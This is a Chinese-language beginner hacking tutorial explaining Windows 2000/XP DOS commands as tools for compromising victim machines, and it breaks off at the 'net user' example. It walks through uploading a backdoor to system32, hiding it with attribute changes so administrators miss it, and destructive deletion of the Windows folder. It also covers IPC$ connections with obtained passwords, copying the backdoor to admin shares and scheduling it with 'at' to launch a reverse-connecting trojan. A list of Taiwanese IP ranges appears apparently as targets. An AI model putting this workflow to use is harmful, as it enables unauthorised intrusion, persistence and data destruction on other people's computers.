大家在入侵时,一定会用到DOS命令的,它的功能非常的强大.今天我就对常用的DOS命令作个详细的解说.主要是给刚入门者和接触DOS命令少的朋友看的.下面我挑几个比较常用的给大家说说.
以windows2000为例,windows xp类同.
DIR
显示当前盘下的所有文件夹和文件.
比较常用的方法是,你上传一个后门或服务端(这儿比如名字叫systems.exe)到肉鸡的c:\winnt\system32下,你想看看有没有上传成功.可以用DIR命令看一下. 命令如下 :
DIR c:\winnt\system32\systems.exe
则会显示:
2004-05-24 20:06 194,762 systems.exe
1 个文件 194,762 字节
0 个目录 4,658,597,888 可用字节
如果你没有上传成功,则显示如下:
驱动器 C 中的卷没有标签。
卷的序列号是 6458-3DB8
c:\winnt\system32\的目录
找不到文件
CD
改变当前目录
具体看一下下面的命令:
C:\>cd winnt file://进/入winnt文件夹
C:\winnt>cd system32 file://进/入system32 文件夹
C:\winnt\system32>cd.. file://回/到上一级目录
C:\winnt>cd..
C:\>
C:\>d: file://进/入D盘
D:\>e: file://进/入E盘
E:\>
del和deltree
DEL:删除文件.
看下面的命令:
C:\>del c:\xx\ww.txt file://删/除C盘的XX目录下的名叫WW的文件.
C:\>
C:\>del c:\xx\*.* file://删/除C盘的XX目录下所有文件
deltree
这个更具有破坏性,不但能删除所有文件,连文件夹也删除
C:\>deltree c:\winnt file://删/除C盘下的winnt所有文件和文件夹.
这个大家要小心使用.
attrid
显示和更改文件或文件夹属性.
文件或文件夹的属性有 隐藏,用字母H表示. 只读,用R表示. 存档,用A表示. 系统,用S表示
改变一个文件或文件夹属性, " + " 表示增加, " - ",表示去掉某个属性.
平时我们都把后门或服务端到上传肉鸡的c:\winnt\system32下.在进入了肉鸡的CMD以后,为了更加的不让肉鸡管理员知道,我们可以把你上传的隐藏起来.比如还是上面的systems.exe
命令如下:
C:\>attrid +h c:\winnt\system32\systems.exe file://这/样在system32下就找不到systems.exe
C:\>attrid -h c:\winnt\system32\systems.exe file://去/掉systems.exe的隐藏属性
copy
复制一个或多个文件到其它目录
比如你把C盘下一个叫1.txt文件复制到D盘的vv文件夹下,
C:\>copy c:\1.txt d:\vv\1.exe
比如你和肉鸡建立了IPC$连接(如何连接?以后会讲的),而且肉鸡开放了共享,这里比如开放了D盘.你可以把你C盘下的一个叫systems.exe的后门或服务端上传肉鸡的D盘下,命令如下:
C:\>copy c:\systems.exe file://肉/鸡IP\d$
type
显示文件内容
我现在在我的C盘的XX目录下新建一个叫hack.txt的文件,内容是一些台湾的IP
命令如下:
C:\>type c:\xx\hack.txt
序号 开始IP地址 结束IP地址 国家/省/直辖市 城市/区县/组织
58 024.179.140.000 024.179.150.255 中国台湾省
80 061.013.000.000 061.013.255.255 中国台湾省
86 061.058.065.000 061.058.070.255 中国台湾省
87 061.059.160.000 061.059.255.255 中国台湾省
89 061.070.100.000 061.070.150.255 中国台湾省
1788 061.217.179.000 061.217.179.255 中国台湾省 台南市
1789 061.216.000.000 061.219.255.255 中国台湾省
1790 061.220.080.000 061.220.150.255 中国台湾省 台北市
1791 061.224.000.000 061.224.255.255 中国台湾省 台北市
1792 061.225.000.000 061.225.255.255 中国台湾省
3390 134.208.000.000 134.208.255.255 中国台湾省
3584 139.175.000.000 139.175.255.255 中国台湾省
3590 140.092.000.000 140.092.255.255 中国台湾省
3593 140.096.000.000 140.096.255.255 中国台湾省
3596 140.112.000.000 140.112.255.255 中国台湾省 台湾大学
C:\>
它还有一个用法,就是在进入肉鸡的CMD以后,看看肉鸡用的是什么操作系统,命令如下,在我电脑操作的结果如下:
C:\>type c:\boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
/fastdetect
看出来没有?,我用的是XP系统.
这是一些我认为常用的命令,其它的还有rd,md等.你们有兴趣可以找资料看看.平进比较少用.
ping
这个是用的最多的命令.可是现在好像不灵光了.大多数网站和个人电脑用防火墙屏蔽了ping.大多数时候根本是P不通.基本命令:
ping ip
ping 网址
下面P的是本站:
C:\>ping http://www.hf110.com/
Pinging http://www.hf110.com/ [218.89.0.231] with 32 bytes of data:
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Ping statistics for 218.89.0.231:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 66ms, Maximum = 67ms, Average = 66ms
上面P出本站的IP是218.89.0.231,从TTL=116.大略看出使用的是windows操作系统.一般来说TTL值在128左右的是windows操作系统,值在225左右的,大多数是unix类系统.但是还有特殊情况,管理员可能会通过改注册表来修改TTL值.
net use
在得到肉鸡的用户名和密码这后,可以用这个命令做IPC$连接
net use \\肉鸡ip\ipc$ "密码" /user:"用户名"
连接成功后,上传后门或服务端,(比如叫systems.exe,在你的D盘下).
copy D:\systems.exe \\肉鸡ip\c$ //这里它要开放共享,你才能上传.否则无法上传成功.
net time \\肉鸡ip //看一下肉鸡的时间,是24小时制.比如这儿是下午3点10分.写作15:10
at \\肉鸡ip 15:12 systems.exe //在15:12分,运行systems.exe
在这儿,你上传的是反弹木马的话,可以等着它来连接你.其实在入侵过程中,有很多的偶然性,比如上面的,你可以IPC连接成功.但是并一定能够通过net time \\肉鸡ip ,看肉鸡时间.就算能看到时间吧,有时肉鸡的at服务并没有打开.就算打开了,但是后门或服务端不一定能够有机会运行,
可能被杀毒软件查杀.所以在入侵过程中,失败是常有的事.这个方法不行,可以另一种.
net user
查看用户或新建一个用户.
这是在我电脑上的截图
C:\>net user
file://bill
